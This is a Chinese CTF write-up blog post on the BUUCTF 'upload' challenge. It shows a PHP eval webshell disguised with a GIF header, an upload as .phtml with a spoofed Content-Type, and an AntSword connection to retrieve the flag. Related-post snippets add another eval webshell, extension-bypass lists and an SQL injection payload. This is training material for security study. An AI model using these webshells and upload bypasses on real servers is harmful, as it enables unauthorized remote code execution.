BUUCTF Web upload

最新推荐文章于 2024-03-20 15:12:46 发布
最新推荐文章于 2024-03-20 15:12:46 发布
阅读量302 收藏 1
点赞数 1
分类专栏: CTF Web 文章标签: 网络安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/H18779083518/article/details/130599184
版权

解题思路:

首先尝试一句话木马上传,尝试过多种绕过手段后发现仍然无法上传,于是我们怀疑是一句话木马被黑名单了

我们更换一个一句话木马:GIF89a? <script language="php">eval($_REQUEST[1])</script>

更改后缀为phtml并将Content-Type里面的格式改为image/jpeg

点击放行后显示成功上传(文件名随便取的)

成功上传一句话木马后我们尝试寻找木马的存放路径

方法一:看bp的回显(我没看见所以选择了方法二)

方法二:正常情况上传的文件都会存放在Upload,更可况题目就叫upload

我们在URL后加/upload,结果发现真有东西:

所以路径就是URL/upload/xxx.phtml

找到路径后使用蚁剑连接,连接成功

一番寻找后发现flag就在更目录下

打开后即得flag:flag{d8c839e5-3aa7-40db-9899-858007fc3778}

临渊♂
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
webupload附件上传
12-14
webupload附件上传,比较方便的附件上传工具,很实用,下载放在项目即可使用
BUUCTF-Web[ACTF2020 新生赛]Upload
rumil的博客
06-24 2046
尝试修改后缀为:php1,php2, php3, php4, php5, phps, pht, phtm, phtml。经过测试和验证,当后缀为.phtml时上传成功的同时语句能被解析,可通过蚁剑连接。这次告诉我们这是一个有害的文件,无法正常上传,说明后端也做了过滤,我们尝试绕过。访问成功,验证是否可执行php语句,能被解析。连接成功,添加,并进入到文件目录,找flag。同理图片码也无法进行解析,上传无效。浏览器搜about:config。修改文件后缀,上传成功但无法解析。回到靶机界面,刷新后,再次上传。
BUUCTF/Upload-Labs-Linux
最新发布
weixin_44041994的博客
03-20 894
strrchr()函数作用为查找字符串在另一字符串中最后一次出现的位置,并返回从该位置到字符串结尾的所有字符,本用来返回后缀名,如:webshell.php,则会返回.php,但是如果我们在.php后再加入一个 . ,则该函数只会返回 . ,可以轻松绕过检查。ps:只能是Windows系统,并且只能是php文件。文件的上传过程为:用户上传文件,服务器获取文件,然后保存临时文件,然后使用移动函数(比如php中的move_uploaded_file() ),才会将文件移动到站点的根目录下面。
upload类型题目总结
limenzzz的博客
04-20 1190
你传你🐎呢
BUUCTF自习笔记第一页加第二页一道笔记
小学生的博客
04-10 1186
有这样一道题目: 【极客大挑战 2019HardSQL】 题目描述呢,是一道SQL的注入题目,本着题目不会在注入点设置太大难度的想法,笔者上来先尝试使用or '1' = '1 'or'1'='1这样逻辑判断尝试,结果发现设置了字符被识别判定,一无所获。 做个备份: payload: 获取表名: admin’^extractvalue(1,concat(0x5c,(select(group_concat(table_name))from(information_schema.tables)where(tab
BUUCTF-Web】[极客大挑战 2019]Upload
weixin_49298681的博客
01-05 1002
Upload=> 文件上传漏洞。
BUUCTF 之 文件上传知识点总结
qq_49833809的博客
11-13 535
文件上传知识点总结
BUUCTF_N1BOOK_[第二章 web进阶]文件上传_详解
weixin_43852034的博客
03-04 916
最后的小插曲:本来以为上传成功之后,用蚁剑砍进去就完事儿了,结果发现居然会报错:嗯???于是直接访问一下上传后的文件:没想到直接得到了flag…后续又把2.php.xxx文件的内容修改为?尝试了一下,发现访问后也是同样的效果。那大概是环境本身做了限制吧…思路应该是没错的,蚁剑虽然说没砍进去…但你就说flag拿没拿到吧!
buuctf之文件上传漏洞(Pass1~15)
yxzrw_TW的博客
10-21 1227
文件上传漏洞笔记
BUUCTFUpload [极客大挑战 2019]
金 帛的博客
04-19 1184
BUUCTF的WP
【用一句话木马文件上传漏洞挖掘实战】
m0_68563451的博客
03-03 1008
6.使用AntSword(中国蚁剑)管理工具连接一句话,注意连接密码就是一句话里的值。5.成功将一句话木马作为头像上传,右键点击查看图像,可以拿到图片路径。3.点击上传头像,将一句话木马改为图片形式上传,并开启bp抓包。4.在抓包代码中将".jpg"改为".php",返回抓包结果。#用一句话木马文件上传漏洞挖掘实战。1.点击新用户注册,注册一个用户。2.注册成功后点击我的个人资料。打开火狐浏览器,访问目标地址。
WebUpload_0.1.5 上传插件
11-29
WebUploader是由Baidu WebFE(FEX)团队开发的一个简单的以HTML5为主,FLASH为辅的现代文件上传组件。在现代的浏览器里面能充分发挥HTML5的优势,同时又不摒弃主流IE浏览器,沿用原来的FLASH运行时,兼容IE6+,iOS 6+,...
webupload 例子
08-01
html大文件上传,速度快。
webupload完整上传程序
12-04
适用于.netcore mvc
webupload.rar
06-20
从网上找的一个文件断点上传的工具包,改了下整成springboot的单独项目,可以独立运行; 限制:不兼容IE8及以下版本(IE9/10 未测试)
BUUCTF】MISC(第一页wp)
leekos的博客,分享web安全相关知识~
12-29 905
BUUCTF】MISC(第一页wp)
SpringBoot(SpringMVC)文件上传下载
热门推荐
好记性不如烂笔头
06-03 9万+
话说,springboot不是一个全新的框架,它只是将其它框架整合在一起,提供一个"开箱即用"的环境。此文,利用的正是SpringMVC的功能。 创建springboot项目:https://blog.csdn.net/weixin_41381863/article/details/106504682 文件上传 在开发中,文件上传常用的有两种方式。 一、利用base64上传文件 思路:客户端将要上传的文件转为base64的二进制数据,服务端利用字符串的形式接收参数,然后将base64转为相应的文件
BUUCTF--BUU UPLOAD COURSE 1
m0_62879498的博客
03-03 7008
BUUCTF–BUU UPLOAD COURSE 1 一进入本题,我们先尝试上传文件,发现我们无论上传什么文件都会上传成功。我们尝试直接上传 shell.php 文件,上传成功,但在访问的时候发现: 我们没有办法访问,使用AntSword进行连接也是报错 题目没有设置上传后缀的限制 但是上传之后任意后缀形式都会被改成.jpg格式(无论我们使用什么办法,包括BP改包,放包后依旧以 .jpg 的格式储存),换句话说 .htaccess 配置文件, 也无法使用我们无法使用中国剑蚁进行连接。 查询了大佬的博客
Web安全-一句话木马
liuwei0376的专栏
08-20 3835
概述 在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马: <?php @eval($_POST['attack']);?> 【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀 chopper.exe 即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语
buuctf upload
10-20
根据提供的引用内容,buuctf upload 是一个文件上传功能。通过上传文件的路径,可以成功访问上传的文件。同时,引用中还提到了一些绕过后端内容检查的方法,例如拼接文件的方式和修改文件后缀名的方式。这些方法可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值